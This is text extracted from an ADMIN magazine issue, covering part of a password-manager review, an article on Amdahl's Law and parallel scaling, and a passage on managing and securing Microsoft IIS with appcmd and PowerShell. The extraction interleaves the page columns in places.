group a meaningful name. The group
name then appears as a folder in the
tree structure in the left-hand pane
below the Root folder.
Next, you need to enter access creden-
tials for the individual accounts to the
newly created group. To do so, click
on the key with the down arrow (or
plus icon, depending on your version)
in the buttonbar. In the dialog that
opens, enter the account’s authentica-
tion data (Figure 7). Enter a title that
is as meaningful as possible as this
title will later appear in the upper-right
pane. Also enter a username and pass- Figure 7: The entry dialog also allows free text input and various options.
word, as well as the account’s URL. If
desired, you can specify whether the Semiautomatic that opens, check the Enable Auto-
access credentials have an expiration Type for this entry option. Then click
date. A free text field at the bottom lets In addition to the ability to save on the wrench (or gear) symbol top
you enter important notes. access credentials in the database right to switch to the application’s
Once the settings are complete, accept and query them when required, configuration menu. To link your web
the entry by pressing the OK button KeePassXC also automatically enters browser to KeePassXC, select Browser
at the bottom right. If you want to the data in the web browser on the Integration in the vertical toolbar. In
specify more advanced options for corresponding web page if desired. the dialog that opens, select the web
the selected account, clicking on Ad- This removes the need for tedious browsers available on the system in
vanced in the vertical toolbar on the typing, but it requires a few prepara- the box under the Enable integration
left opens a dialog where you can add tions beforehand. for these browsers label by checking
further information, including attach- First, you must enable the Auto-Type the boxes to the left of the browser
ments that you want KeePassXC to function for the selected entry. To names (Figure 8).
store in the database. do this, click on Auto-Type in the Note that KeePassXC only supports
Clicking Entry in the vertical toolbar vertical toolbar on the left when the the browsers listed in the selection
takes you back to the original dialog. entry is open. In the Settings dialog box. For Firefox, Chromium, and
After saving the entry, it now appears
in the upper right pane, which lists
all entries for the selected group.
If you define several groups, each of
them will be a subgroup of the last
group entered in the left pane. If you
want to move a group to a different
hierarchical level, click on it and drag
it to another position in the tree struc-
ture; if desired, you can drag an entry
one or more levels upwards.
Within the individual groups, you can
enter the corresponding entries in the
same dialog. For subsequent changes
to entries, first click on the entry to be
edited in the upper-right pane to select
it. The pencil Entry icon in the toolbar
then reopens the Edit entry dialog. You
can also remove the selected entry from
the list by pressing the delete icon. Figure 8: KeePassXC supports browser integration in a somewhat awkward way.

80 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Password Managers N U TS A N D B O LTS

some of their derivatives, you need In addition, KeePassXC must already Edit | Add Folder. The parent folder
to download add-ons in the next step be running to autofill access data. appears in a window and expects
and integrate them into the browser. You can do this in the automatic a name to be entered in the Folder
You can do this conveniently using the startup routine at system start time Name field.
links available in the configuration dia- by checking the Start only a single You can then create additional folders
log. Add-ons are used to connect web instance of KeePassXC option in the by right-clicking on the newly created
browsers and password management. General menu’s configuration dialog. folder and adding another folder to the
They must therefore be installed be- Also, if you check the box to the left database with Add Folder. Pasaffe al-
fore you can use the Auto-Type func- of Minimize window after unlocking ways creates the new folder below the
tion mentioned above. The respective the database window, KeePassXC will currently selected folder, creating a tree
add-ons appear in the browser toolbar be hidden away in the panel when hierarchy shown in the vertical pane on
as small status icons (Figure 9). minimized. the left. If you create additional folders
Then restart KeePassXC and go to one within an existing hierarchy, Pasaffe
of the addresses in your web browser Pasaffe will insert them in alphabetical order.
that you have set up for auto-type. You can also delete a folder using the
A small green key symbol will now Pasaffe [10] is a small password context menu, which you access by
appear on the chosen website in the manager published under GPLv3. right-clicking. However, this will re-
fields for entering the access data. Originally developed for Ubuntu, move all subfolders in this hierarchy
Simultaneously, another window will Pasaffe is now also included in vari- without prompting.
pop up and request the authentication ous derivatives such as Trisquel and If you want to create a new folder
data from KeePassXC for access (Fig- Linux Mint, as well as in Arch-based and place it in a different hierarchical
ure 10). Click on Allow Selection; this distributions such as Manjaro. Be- level, you do not have to switch to
will autofill the credentials from the sides a PPA for Ubuntu, the source the desired level first. Instead, enter
KeePassXC database into the fields code is also available. the correct path for the new directory
without requiring any further input Developed for the Gnome desktop, in the Parent Folder field. Note that in
from you. Pasaffe can also be used with other such cases the hierarchy always starts
To use auto-type, the chosen website desktop environments without any with the root folder /; you therefore
must request the username and pass- problems. The straightforward program need to enter the full path.
word together. If a website opens a opens a small window after installa- Once the folder structure exists, you
new page or a window to prompt you tion, where you can enter a master can add the corresponding database
for a password after the username password for the new database. Then it entries. To do this, use the Add Entry
has been entered, KeePassXC does au- creates the database and opens the very option in a folder’s context menu
tofill the authentication data. simple main window (Figure 11). (you can also access this via the Edit
menu if necessary). Alternatively, you
Nomenclature can open the dialog using the second
button from the left in the buttonbar
Pasaffe divides of the main window.
datasets to be In the input window, you enter a
entered into fold- name for the entry, the URL, and the
ers and entries. authentication data. A note field also
Folders function as allows free text input of important
groups in which data for this entry. After a final click
Figure 9: The add-on reports its operational readiness with a you store similar on OK, the entry appears on the left
status icon. authentication below the active folder. In the right-
data. To create the hand pane, you will find the details of
first folder, go to the current entry (Figure 12).

Figure 10: A single mouse click lets you allow autofill for access Figure 11: Pasaffe greets users after launching with a mostly empty
credentials. main window.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 81
N U TS A N D B O LTS Password Managers

Inserted notes also appear on the right, New button top


but the password for the respective left in the titlebar
entry is only shown as asterisks. If nec- (Figure 13) and
essary, you can make the password vis- assign a name in
ible by clicking on the last icon, Show the now opened
Confidential, top right in the toolbar file manager.
(click on the ellipses if you do not see In the next
the option). The password now appears dialog, you can
in plain text and can be made anony- define the access
mous by clicking the button again. procedure for the
database. You
Seek and Ye Shall Find can choose from
three options: a
With extensive datasets, you can very password, a key Figure 12: Pasaffe arranges groups and entries in a tree structure.
quickly get lost in Pasaffe’s main win- file, or both.
dow. In this case, click on the magni- After opening the new safe, you are that might be useful as attachments.
fying glass icon in the toolbar. In the taken to an empty window. Here you Password Safe automatically saves
search field located top right, you can can create groups to which you assign the changes to the entry data again.
now enter the entry name for which individual websites’ access creden- When the respective group is called
you are searching. The application tials by category. To do this, click on up again, the changes appear in tabu-
jumps to this entry in the left window the hamburger menu in the top right- lar form in the program window.
pane and displays the required data hand corner and select the New Group To switch to another group, first
on the right below the search field. option. In an input dialog, type in the click on the home icon located top
group name and optionally add a note left in the titlebar and then select the
In the Browser in a free text field. You do not have desired group from the table of dis-
to save the entered data; the software played groups. The program window
Pasaffe does not offer a browser add-on does this automatically. lists the entries for the group, while
for automatic entry of access creden- To add entries to the individual groups the active group appears in the top
tials. Instead, you need to select a data- (which are tagged with a folder icon), right corner next to the home icon.
base entry and open the corresponding click on the home icon on the left and
URL by clicking on the home icon in then select the desired group. The se- Settings
the toolbar. This will launch the web lected group then appears to the right
browser, which then calls up the page of the home icon in the titlebar. Now The Settings dialog (Figure 14),
for entering the access data. Unlike a click on the hamburger icon in the which you open via the hamburger
browser add-on, username and pass- right-hand corner of the titlebar and menu, offers a few options for cus-
word input is only partly automated. select the New Entry option. tomizing the software.
You need to copy the access credentials This step opens a dialog for the au- Under Safe, use a slider to activate
to the clipboard by selecting Copy User thentication data. For each entry, the option Save Automatically. In the
Name and Copy Password and then you can also store important notes Security tab, you will also want to set
paste these into the appropriate fields in a free text field. Additionally, the a different interval for Time threshold
in the web browser. Attachments field lets you store files for locking the safe if your computer

Password Safe
Password Safe [11] is based on the
Gnome desktop in terms of appear-
ance and ergonomics, but it can also
be used with other desktops. Pass-
word Safe is available as a Flatpak
and can therefore be installed across
different distributions.
The installation routine creates a
starter in the desktop menu tree. After
the first launch, a visually appealing
program window appears in which
you first need to create a KeePass-com-
patible database. To do so, press the Figure 13: Password Safe lacks just about all conventional control elements.

82 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Password Managers N U TS A N D B O LTS

frequently runs in unattended mode. Table 1: Graphical Password Managers


This function locks the password safe
Buttercup KeePassXC Pasaffe Password Safe
if you do not perform any actions in
the software for a longer period of License GPLv3 GPLv2 GPLv3 GPLv3
time. You then have to enter the mas- Functions
ter password again for further access. Available across platforms Yes Yes No No
Desktop application Yes Yes Yes Yes
Multiple Safes Browser extension Yes Yes No No
User guidance
In Password Safe, you can use several
Multiple archives Yes Yes No No
data safes in parallel. To create a new
one, click on the New Safe option in Multiple groups Yes Yes Yes Yes
the hamburger menu and configure Free text input Yes Yes Yes Yes
it. The new safe then appears as a Data import Yes Yes Restricted Restricted
new horizontal tab in the applica- Data export Yes Yes Restricted Restricted
tion’s main window, which allows a Password generator Yes Yes Yes Yes
quick change between the individual Auto-Type Yes Yes Restricted Restricted
safes. You can also block these safes
Security
by clicking on the padlock symbol
at the top of the hamburger menu’s Cloud backup Configurable Yes No No
Options dialog, thereby blocking the Encryption Yes Yes Yes Yes
active safe. If you call up the active Adjustable encryption No Yes No No
safe again, the dialog for entering the algorithm
master password appears.
button. The access data can then be in their web browsers. Buttercup addi-
Password Safe in the Browser called up from the clipboard in the tionally impresses with a modern, vi-
browser whenever you need to fill out sually appealing interface. KeePassXC
Password Safe does not have add- the fields on the website. converts data to and from other for-
ons a for the popular web browsers. mats thanks to numerous filters.
Nevertheless, you do not have to Conclusions Despite all the simplifications made
laboriously query the data in the ap- by these password managers, cau-
plication and then transfer it to the Local password managers make work- tious users are still advised to keep
web browser. Instead, you can save ing with large volumes of access records and backups of their access
the usernames and passwords for the credentials far easier. The four test credentials to ensure continued ac-
individual entries in Password Safe candidates all cover the basic range of cess to protected data in the event of
by clicking on the Copy to Clipboard functions for password management, an accident. n
but they focus on
different target Info
groups in terms of [1] Gryptonite: [https://sourceforge.net/
features (Table 1). projects/gryptonite/]
Password Safe [2] MyPasswords: [https://sourceforge.net/
and Pasaffe are projects/mypasswords7/]
more suitable for [3] Loxodo:
home use, as they [https://github.com/sommer/loxodo]
do not offer add- [4] pass: [https://www.passwordstore.org]
ons for common [5] Buttercup: [https://buttercup.pw]
web browsers. Ac- [6] Download Buttercup: [https://github.com/
cess data must be buttercup/buttercup-desktop/releases]
entered here spe- [7] KeePassXC: [https://keepassxc.org]
cifically via the [8] Download KeePassXC:
clipboard on web- [https://keepassxc.org/download/#linux]
sites. Buttercup [9] KeePassXC Flatpak package :
and KeePassXC [https://flathub.org/apps/details/org.
are aimed at pro- keepassxc.KeePassXC]
fessional users [10] Pasaffe: [https://launchpad.net/pasaffe]
who want to save [11] Password Safe: [https://gitlab.gnome.org/
Figure 14: Password Safe has a very simple configuration dialog. themselves typing World/PasswordSafe]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 83
N U TS A N D B O LTS Parallel Performance

Why Good Applications Don’t Scale

Speed Limits

You have parallelized your serial application, but as you use more cores you are not seeing any improvement in
performance. What gives? By Jeff Layton
You just bought a new system with lots and lots of cores (e.g., a desktop with 64 cores or a server with 128 cores). Now that you have all of these cores, why not take advantage of them by parallelizing your code? Depending on your code and your skills, you have a number of paths to parallelization, but after some hard work profiling and lots of testing, your application is successfully parallelized – and it gives you the correct answers! Now comes the real proof: You start checking your application's performance as you add processors.

Suppose that running on a single core takes about three minutes (180 seconds) of wall clock time. Cautiously, but with lots of optimism, you run it on two cores. The wall clock time is just about two and a half minutes (144 seconds), which is 80 percent of the time on a single processor. Success! You are seeing parallel processing in action, and for some HPC enthusiasts, this is truly thrilling. After doing your "parallelization success celebration dance," you go for it and run it on four cores. The code runs in just over two minutes (126 seconds). This is 70 percent of the time on a single core. Maybe not as great as the jump from one to two cores, but it is running faster than a single core. Now try eight cores (more is better, right?). This runs in just under two minutes (117 seconds) or about 65 percent of the single core time. What?

Now it's time to go for broke and use 32 cores. This test takes about 110 seconds or about 61 percent of the single core time. Argh! You feel like Charlie Brown trying to kick the football when Lucy is holding it. Enough is enough: Try all 64 cores. The application takes 205 seconds. This is maddening! Why did the wall clock time go up? What's going on?

Gene Amdahl

In essence, the wall clock time of an application does not scale with the number of cores (processors). Adding processors does not linearly decrease time. In fact, the wall clock time can increase as you add processors, as it did in the example here. The scalability of the application is limited for some reason: Amdahl's Law. In 1967 Gene Amdahl proposed the formula underlying these observed limits of scalability:

a = \frac{1}{(1 - p) + p/n} \qquad (1)

In Equation 1, a is the application speedup, n is the number of processors, and p is the "parallel fraction" of the application (i.e., the fraction of the application that is parallelizable), ranging from 0 to 1. Equations are nice, but understanding how they work and what they tell us is even more important. To do this, examine the extremes in the equation and see what speedup a can be achieved.

In an absolutely perfect world, the parallelizable fraction of the application is p = 1, or perfectly parallelizable. In this case, Amdahl's Law reduces to a = n. That is, the speedup is linear with the number of cores
and is also infinitely scalable. You can keep adding processors and the application will get faster. If you use 16 processors, the application runs 16 times faster. It also means that with one processor, a = 1.

At the opposite end, if the code has a zero parallelizable fraction (p = 0), then Amdahl's Law reduces to a = 1, which means that no matter how many cores or processes are used, the performance does not improve (the wall clock time does not change). Performance stays the same from one processor to as many processors as you care to use.

In summary, if the application cannot be parallelized, the parallelizable fraction is p = 0, the speedup is a = 1, and application performance does not change. If your application is perfectly parallelizable, p = 1, the speedup is a = n, and the performance of the application scales linearly with the number of processors.
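If you want to probe these two extremes yourself, a few lines of Python suffice. This is only a sketch of Equation 1; the function name is an arbitrary choice, not something from a library:

# Minimal sketch of Amdahl's Law (Equation 1).
def amdahl_speedup(p, n):
    """Speedup a for parallel fraction p on n processors."""
    return 1.0 / ((1.0 - p) + p / n)

print(amdahl_speedup(1.0, 16))  # p = 1: a = n, here 16.0
print(amdahl_speedup(0.0, 16))  # p = 0: a = 1.0, no improvement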
Further Exploration

To further understand how Amdahl's Law works, take a theoretical application that is 80 percent parallelizable (i.e., 20 percent cannot be parallelized). For one process, the wall clock time is assumed to be 1,000 seconds, which means that 200 seconds of the wall clock time is the serial portion of the application. From Amdahl's Law, the minimum wall clock time the application can ever achieve is 200 seconds. Figure 1 shows a plot of the resulting wall clock time on the y-axis versus the number of processes from 1 to 64.

Figure 1: The influence of Amdahl's Law on an 80 percent parallelizable application.

The blue portion of each bar is the application serial wall clock time and the red portion is the application parallel wall clock time. Above each bar is the speedup a by number of processes. Notice that with one process, the total wall clock time – the sum of the serial portion and the parallel portion – is 1,000 seconds. Amdahl's Law says the speedup is 1.00 (i.e., the starting point).

Notice that as the number of processors increases, the wall clock time of the parallel portion decreases. The speedup a increases from 1.00 with one processor to 1.67 with two processors. Although not quite a doubling in performance (a would have to be 2), about one-third of the possible performance was lost because of the serial portion of the application. Four processors only gets a speedup of 2.5 – the speedup is losing ground. This "decay" in speedup continues as processors are added. With 64 processors, the speedup is only 4.71. The code in this example is 80 percent parallelizable, which sounds really good, but 64 processors only use about 7.36 percent of the capability (4.71/64).

As the number of processors increases to infinity, you reach a speedup limit. The asymptotic value of a = 5 is described by Equation 2:

\lim_{n \to \infty} a = \frac{1}{1 - p} \qquad (2)

Recall the parallelizable portion of the code is p. That means the serial portion is 1 - p, so the asymptote is the inverse of the serial portion of the code, which controls the scalability of the application. In this example, p = 0.8 and (1 - p) = 0.2, so the asymptotic value is a = 5.
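A quick numerical check with p = 0.8 reproduces the speedups quoted for Figure 1 and shows the slow approach to the asymptote (again, just a sketch of Equations 1 and 2, not code from the article):

# Probing Equation 2's asymptote for p = 0.8.
for n in (1, 2, 4, 64, 10**6):
    a = 1.0 / (0.2 + 0.8 / n)
    print(n, round(a, 2))  # 1.0, 1.67, 2.5, 4.71, then ~5.0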
Further examination of Figure 1 illustrates that the application will continue to scale if p > 0. The wall clock time continues to shrink as the number of processes increases. As the number of processes becomes large, the amount of wall clock time reduced is extremely small, but it is non-zero. Recall, however, that applications have been observed to have a scaling limit, after which the wall clock time increases. Why does Amdahl's Law say that the applications can continue to reduce wall clock time?

Limitations of Amdahl's Law

The disparity between what Amdahl's Law predicts and the time in which applications can actually run as processors are added lies in the differences between theory and the limitations of hardware. One such source of the difference is that real parallel applications exchange data as part of the overall computations: It takes time to send data to a processor and for a processor to receive data from other processors. Moreover, this time depends on the number of processors. Adding processors increases the overall communication time.

Amdahl's Law does not account for this communication time. Instead, it assumes an infinitely fast network; that is, data can be transferred infinitely fast from one process to another (zero latency and infinite bandwidth).
Non-zero Communication Time

A somewhat contrived model can illustrate what happens when communication time is non-zero. This model assumes that serial time is not a function of the number of processes, just as does Amdahl's Law. Additionally, a portion of time is not parallelizable but is also a function of the number of processors, representing the time for communication between processors that increases as the number of processes increases.

To create a model, start with a constraint from Amdahl's Law that says the sum of the parallelizable fraction p and the non-parallelizable fraction (1 - p) has to be 1:

p + (1 - p) = 1

Remember that in Amdahl's Law the serial or non-parallelizable fraction is not a function of the number of processors. Assume the serial fraction is:

s = 1 - p

The constraint can then be rewritten as:

p + s = 1

The serial fraction can be broken into two parts (Equation 6), where sB is the base serial fraction that is not a function of the number of processors, and sC is the communication time between processors, which is a function of n, the number of processors:

s = s_B + s_C n \qquad (6)

When this equation is substituted back into Amdahl's Law, the result is Equation 8 for speedup a:

a = \frac{1}{s_B + s_C n + p/n} = \frac{n}{s_B n + s_C n^2 + p} \qquad (8)

Notice that the denominator is now a function of n².

From Equation 8 you can plot the speedup. As with the previous problem, assume a parallel portion p = 0.8, leaving a serial portion s = 0.2. Assigning the base serial portion sB = 0.195, independent of n, leaves the communication portion sC = 0.005. Figure 2 shows the plot of speedup a as a function of the number of processors.

Figure 2: Speedup with new model.

Notice that the speedup increases for a bit but then decreases as the number of processes increases, which is the same thing as increasing the number of processors and increasing the wall clock time. Notice that the peak speedup is only about a = 3.0 and happens at around 16 processors. This speedup is less than that predicted by Amdahl's Law (a = 5). Note that you can analytically find the number of processors for the peak speedup by taking the derivative of the equation plotted in Figure 2 with respect to n and setting it to 0. You can then find the speedup from the peak value of n. I leave this exercise to the reader.
Although the model is not perfect, it does illustrate how the application speedup can decrease as the number of processes increases. On the basis of this model, you can say, from a higher perspective, that the equation for a must have a term missing that perhaps Amdahl's Law doesn't show that is a function of the number of processes, causing the speedup to decrease with n.

Some other attempts have been made to account for non-zero communication time in Amdahl's Law. One of the best is from Bob Brown at Duke [1]. He provides a good analogy for an Amdahl's Law that includes communication time in some fashion.

Another assumption in Amdahl's law drove the creation of Gustafson's Law. Whereas Amdahl's Law assumes the problem size is fixed relative to the number of processors, Gustafson argues that parallel code is run by maximizing the amount of computation on each processor, so Gustafson's Law assumes that the problem size increases as the number of processors increases. Thus, solving a larger problem in the same amount of time is possible. In essence, the law redefines efficiency.

You can use Amdahl's Law, Gustafson's Law, and derivatives that account for communication time as a guide to where you should concentrate your resources to improve performance. From the discussion about these equations, you can see that focusing on the serial portion of an application is an important way to improve scalability.

Origin of Serial Compute Time

Recall that the serial portion of an application is the compute time that doesn't change with the number of processors. The parts of an application that contribute to the serial portion of the overall application really depend on your application and algorithm. Serial performance has several sources, but usually a predominant source
is I/O. When an application starts, it most likely needs to read an input file so that all of the processes have the problem information. Some applications also need to write data at some point while they run. At the end, the application will likely write the results.

Typically these I/O steps are accomplished by a single process to avoid collisions when multiple processes do I/O, particularly writes. If two processes open the same file, try to write to it, and the filesystem isn't designed to handle multiple writes, the data might be written incorrectly. For example, if process 1 is supposed to write data first, followed by process 2, what happens if process 2 writes first followed by process 1? You get a mess. However, with careful programming, you can have multiple processes write to the same file. As the programmer, you have to be very careful that each process does not try to write where another process is writing, which can involve a great deal of work.

Another reason to use a single process for I/O is ease of programming. As an example, assume an application is using the Message Passing Interface (MPI) library [2] to parallelize code. The first process in an MPI application is the rank 0 process, which handles any I/O on its own. For reads, it reads the input data and sends it to other processes with MPI_Send, MPI_Isend, or MPI_Bcast from the rank 0 process and with MPI_Recv, MPI_Irecv, or MPI_Bcast for the non-rank-0 processes. Writes are the opposite: The non-rank-0 processes send their data to the rank 0 process, which does the I/O on behalf of all processes.
I/O on behalf of the other processes which is one of the reasons you lel IO,” by Jeff Layton, [https://www.
by exchanging data creates a serial wrote a parallel application in the admin-magazine.com/HPC/Articles/
bottleneck in your application be- first place. However, when at some Improved-Performance-with-Parallel-I-O]
cause only one process is doing I/O, point increasing the number of pro-
forcing the other processes to wait. cessors used in the application stops The Author
If you want your application to scale, decreasing and starts increasing the Jeff Layton has been in the HPC business for al-
you need to reduce the amount of wall clock time of the application, most 25 years (starting when he was 4 years old).
serial work done by the application, it’s time to start searching for rea- He can be found lounging around at a nearby Frys
including moving data to or from sons why this is happening. enjoying the coffee and waiting for sales.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 87
NUTS AND BOLTS

Securing and managing Microsoft IIS

The Right Tools

If you use IIS on Windows servers, you can fully access the web server's features and manage it effectively with on-board tools, including the well-known Internet Information Services (IIS) Manager, Windows Admin Center, and PowerShell. By Thomas Joos
In this article, I look into the options Microsoft provides for effective management of Internet Information Services (IIS). You can easily manage web servers on Windows Server 2019 with multiple tools in parallel (e.g., the IISAdministration module in PowerShell). The command line on Windows servers also offers a way to manage the web server with the appcmd and iisreset tools, not only for servers with graphical user interfaces, but also for core servers and containers. In this article, I assume you have IIS configured on Windows Server 2019 (Figure 1), but most settings also apply to Windows Server 2012 R2 and 2016.

Figure 1: With PowerShell, you can check whether IIS is installed on a server.

Managing the Web Server and Sites

Once IIS is up and running, it can be managed with the IIS Manager. The fastest way to launch this tool is to enter inetmgr.exe. If you do need to restart the IIS system service, you can use

net stop w3svc
net start w3svc

or you can work with Stop-Service, Start-Service, or Restart-Service in PowerShell. In Windows Admin Center, you can use the Services area. The system services themselves can be accessed by typing services.msc.

To restart the web server, run either of the following commands at the command line:

iisreset
iisreset /noforce
In addition to starting and stopping the entire server, you can also temporarily disable individual websites. All other websites on the server are unaffected; open the IIS Manager and click on the website you want to restart or stop. In the Actions area of the console, the Manage Website section displays the commands for restarting and stopping.

At the command prompt, you can use the appcmd tool to restart or quit. Type the commands

appcmd stop site /site.name:contoso
appcmd start site /site.name:contoso

to stop and restart the Contoso website. However, the tool is not directly in the path for the command prompt, so it cannot be called directly. First you need to change directory to \Windows\System32\inetsrv. You can get detailed help by typing appcmd /?. Because help is context sensitive, you can also get appropriate support for individual commands, such as appcmd site /?.

Viewing Requests and Creating Backups

The appcmd command displays the current requests to a web server and backs up its data. Current requests can be retrieved and the settings of a server backed up by typing:

appcmd list request
appcmd add backup <name>

Creating a backup is a good idea before you start making system changes. The existing backups can be viewed and restored with:

appcmd list backups
appcmd restore backup <name>

However, if you back up the server before changing to a distributed configuration and restore this backup, you will have a local configuration again after the restore.

Of course, you should run this backup as a regular task on Windows and save the IIS configuration to a file:

%WinDir%\system32\inetsrv\appcmd.exe add backup "<name of backup>"

Then, you can delete existing backups with the

appcmd.exe delete backup "<name of backup>"

command.

Developer Tools in Internet Explorer and Edge

The developer tools in Internet Explorer and Edge are interesting for administrators and developers alike. To access them, press F12. The tools display the source code for a page and help with error analysis (e.g., if a page takes a long time to load). The Network tab lets you check the loading times of pages to determine which areas of a website delay loading. To analyze a page later, just save the output.

Managing IIS in Windows Admin Center

Microsoft provides an extension to Windows Admin Center for servers on which IIS is installed. This extension already has almost all of the same functions as the IIS Manager. The advantage of Windows Admin Center is that central administration of IIS is far easier than with the IIS Manager (Figure 2).

Figure 2: Managing IIS with Windows Admin Center is relatively easy.

To use the extension, add it in the Windows Admin Center settings from Extensions. The Admin Center will then automatically show the appropriate options if IIS is installed on a server. The options are located in the Extensions section of the navigation sidebar from IIS. Microsoft is expected to integrate IIS management permanently into the menu structure of Windows Admin Center. Also in the Admin Center, install the extension for managing IIS over the network on the corresponding server, if necessary. Microsoft also provides the necessary extension on GitHub [1].

After the IIS extension connects to the appropriate server in Windows Admin Center, select the website whose settings you want to change. If the server settings are not displayed, your monitor's resolution is not high enough. In this case, it might be useful to hide the Windows Admin Center menubar with the arrow in the upper left corner. Afterward, Windows Admin Center displays the commands for managing IIS in a separate menu area. The settings are then accessible. The Settings, Bindings, Limits, and Application Pool tabs are used to manage the settings for the site. The Monitoring tab also provides a separate area for monitoring the performance of a web server.
Adjusting the Security Settings

You can use the tools mentioned above to configure the security settings of the web server. In most cases, IIS Manager is still used. Important settings primarily relate to the firewall on the server, for which you can use the standard firewall console (wf.msc; Figure 3) or Windows Admin Center. PowerShell also lets you set rules for the Windows firewall on web servers and comes with the advantage of scripting and automating the configuration work. To create a new firewall rule, for example, use:

New-NetFirewallRule -DisplayName "ICMP block" -Direction Inbound -Protocol icmp4 -Action Block

Figure 3: The Windows firewall plays an important role in securing Windows servers. This also applies to IIS.

As you can see, you need to specify the name of the rule, define the protocol, and control the respective action. Instead of creating a new firewall rule with New-NetFirewallRule, it is often easier to copy existing firewall rules with the Copy-NetFirewallRule command. If you work with IPsec, you can also copy the rules with the Copy-NetIPsecRule cmdlet. Of course, after you copy a rule, you can rename it with Rename-NetFirewallRule, although you can assign a new name as soon as you copy it:

Copy-NetFirewallRule -DisplayName "Require Outbound Authentication" -NewName "Alternate Require Outbound Authentication"

Firewall rules in PowerShell can also be deleted with Remove-NetFirewallRule.

Securing Access

The IP Address and Domain Restrictions feature lets you create access rules to block access to predefined IP ranges and domains. To begin, enable the Edit Feature Settings option. You must install the IP and Domain Restrictions role service.

HTTP redirection means that all access to a specific URL is automatically redirected to another URL. For example, you can redirect your site if you are currently editing parts of it. You could have, say, all requests to www.contoso.com/marketing/default.aspx redirected to the www.contoso.com/sales/default.aspx site. Redirections can be configured at the server or website level by the HTTP Redirection feature. However, you must first install this feature as a role service.

In addition to redirection, you can also define the behavior of the configuration at this point. If you check the Redirect all requests to the exact destination (instead of relative to destination) box, requests are always redirected to exactly the address you specified in the redirection. This also applies when requests are sent to subfolders. If you select the Only redirect requests to content in this directory (not subdirectories) checkbox, the server will redirect requests that are directed to subfolders of the redirected folder directly to the redirection target.

You can set the SSL bindings for web pages in IIS Manager or you can use Windows Admin Center and the IIS extension. Unencrypted access to IIS on SSL pages can also be redirected automatically, for which Microsoft provides the free URL Rewrite [2] extension. In the IIS Manager, first install the extension and then call URL Rewrite. Add Rule lets you create new rules (Figure 4).

Figure 4: URL Rewrite lets you execute automatic URL redirections.

You can also redirect manually in two ways. For the first method, you can define the corresponding settings in the configuration of the HTTP 403 error message by calling the IIS Manager on the server and clicking on the server name and the website. The Error Pages option is found here, as well. Now double-click on the error pages in the IIS section on the start page and open the 403 error item. Now activate the Respond with a 302 redirect option, enter the HTTPS URL that the users should access, and press OK to confirm. This type of redirection does not always work. In this case, use the second option
for redirection. Start IIS Manager and click on the page for which you want to configure HTTP redirection. Click Bindings and change the binding port from 80 to another free port (e.g., 8001). Now right-click Sites and create a new site with the Add command. As the site name, in the Add Site Binding dialog, assign to the new website the name that users will use to access the server over HTTP (e.g., powerpivot.contoso.int). Now create a physical path. The folder remains empty; you only need it for IIS, not for the configuration. Leave the binding set to port 80. Because you have already changed the binding of the default page, this port is available. As the hostname, enter the name to which you want the server to respond (e.g., powerpivot.contoso.int).

After you confirm that you want to create the website, you will then receive a message that port 80 is already in use because port 80 is still assigned to the default website in IIS, even if you changed the port of the site from 80 to another port. However, this page is closed during the install, so it has no significance to the server. Next, click on the newly created page and then double-click HTTP Redirect in the IIS section.

Check the Redirect requests to this destination box and enter the HTTPS address to which you want the server to redirect the requests. Check the Redirect all requests to exact destination box and then press Apply. If users now enter the URL for which you have configured redirection, IIS will detect this access and automatically redirect the request.
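To confirm the redirect from a client without a browser, a short Python check works with any HTTP library. This is only a sketch; the hostname is the example name from above, and the handler trick simply stops Python from following the redirect so the 302 stays visible:

# Sketch: verify that IIS answers with a 302 and the HTTPS target.
import urllib.request, urllib.error

class NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # do not follow redirects; surface them instead

opener = urllib.request.build_opener(NoRedirect())
try:
    resp = opener.open("http://powerpivot.contoso.int/")
    print("no redirect:", resp.status)
except urllib.error.HTTPError as e:
    print(e.code, e.headers.get("Location"))  # expect: 302 https://...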

Activating and Configuring Logging

In addition to tracking failed requests, you can also log normal IIS operations through the Logging item on the IIS Manager home page. Logging can be enabled for individual pages and applications separately in the Actions area of the console. By default, logging is enabled for the server itself and for websites.

Logfiles can be saved in any folder. By default, the files end up in the \inetpub\logs\LogFiles folder. In the first selection field, you need to specify in the listbox whether you want to create a logfile for each web page or a file for the entire server. Various logfile formats are available; however, you should leave logfile encoding set to UTF-8. Logfile formats include:

• W3C (default): These logfiles are stored as text; the Select Fields button lets you specify what should be logged in the file. The individual fields are separated by spaces.
• IIS: This selection also saves the logfiles in text format; however, the comma-separated individual fields are fixed and therefore cannot be adjusted.
• NCSA (National Center for Supercomputing Applications): Here, too, the fields are fixed, and less information is logged than with the other protocol methods.

In this window, you also specify when new logfiles should be created – according to a certain schedule (hourly, daily, weekly, or monthly), according to a certain size, or not at all. The selection depends on, among other things, the number of visitors to the server. If you do not check the Use local time for file naming and rollover option, UTC (world time) is used by default.
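Because W3C logs are plain text with a #Fields: header line, they are easy to post-process. The following sketch tallies requests per URL; the logfile path and the cs-uri-stem field are assumptions that depend on your site ID and field selection:

# Sketch: count requests per URL in a W3C-format IIS logfile.
from collections import Counter

fields, hits = [], Counter()
with open(r"C:\inetpub\logs\LogFiles\W3SVC1\u_ex210101.log") as log:
    for line in log:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]              # column names
        elif not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            hits[row.get("cs-uri-stem", "?")] += 1

for url, count in hits.most_common(10):
    print(count, url)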

Optimizing Server Performance

Compression can improve server response times and save bandwidth when transmitting web pages. You can manage compression with the feature of the same name in IIS Manager. Some settings are only available at the server level. However, many settings can also be made at the website and application levels, so each application uses its own settings for compression. Enabling compression will increase the load on the server hardware.

Parts of the websites can be made available in the web server's cache, so retrieving these parts does not expose the server to load. You can use the Output Caching feature in IIS Manager to manage this feature. The cache is enabled by default, and you can set limits in the settings; however, the cache is only useful in production after you have defined rules to determine which data you want the server to cache.
Remote IIS Management

In PowerShell and Windows Admin Center, you can access a server running IIS over the network. Although this is also possible with IIS Manager, it is far more complicated to configure and use. For example, to open a connection, use:

Enter-PSSession -ComputerName <Servername>

Get-Website displays the websites on the server, including the bindings and all settings. You can see the individual bindings by typing Get-WebBinding, which lets you check which websites are available on a server and which bindings are in use. From this information, you can also add bindings to websites (e.g., for the use of SSL). To create a new binding, for example, to enable SSL for a site, enter:

